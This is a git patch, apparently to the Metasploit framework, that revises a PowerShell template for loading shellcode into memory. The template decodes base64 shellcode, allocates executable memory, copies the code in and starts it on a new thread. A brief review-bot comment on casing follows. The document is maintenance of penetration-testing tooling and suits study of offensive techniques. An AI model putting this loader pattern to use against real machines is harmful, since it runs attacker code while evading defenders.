From 14c0096115a616a0fb51c00f7e6ffbe865825f37 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Mon, 16 Dec 2013 13:38:14 +0000
Subject: [PATCH] Update template Use Copy instead of memset Remove | Out-Null
---
 .../scripts/to_mem_pshreflection.ps1.template | 10 +++-------
 lib/msf/util/exe.rb | 1 -
 2 files changed, 3 insertions(+), 8 deletions(-)
diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index 95b37d1b6a..d1a83daf0c 100644
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -21,11 +21,7 @@ function %{func_get_delegate_type} {
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
-$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
-for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
- $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
-}
-
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
\ No newline at end of file
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 486076e448..3465ab42db 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector'
 rig.init_var(:var_return_type)
 rig.init_var(:var_type_builder)
 rig.init_var(:var_buffer)
- rig.init_var(:var_memset)
 rig.init_var(:var_hthread)
 hash_sub = rig.to_h
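Review bot: The added `Marshal::Copy` line spells the array length as `$%{var_code}.length`, while the context line two lines above in the same hunk uses `$%{var_code}.Length`; PowerShell member lookup is case-insensitive, so this is harmless, but the template should settle on one spelling — `[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.Length)`. The same casing drift appears in the last added line, where the removed line's `0xFFFFFFFF` becomes `0xffffffff`. The `function %{func_get_delegate_type} {` shown in the hunk header is only git's nearest preceding declaration; the changed lines appear to sit at script top level rather than inside that function, so the enclosing scope is the whole template file.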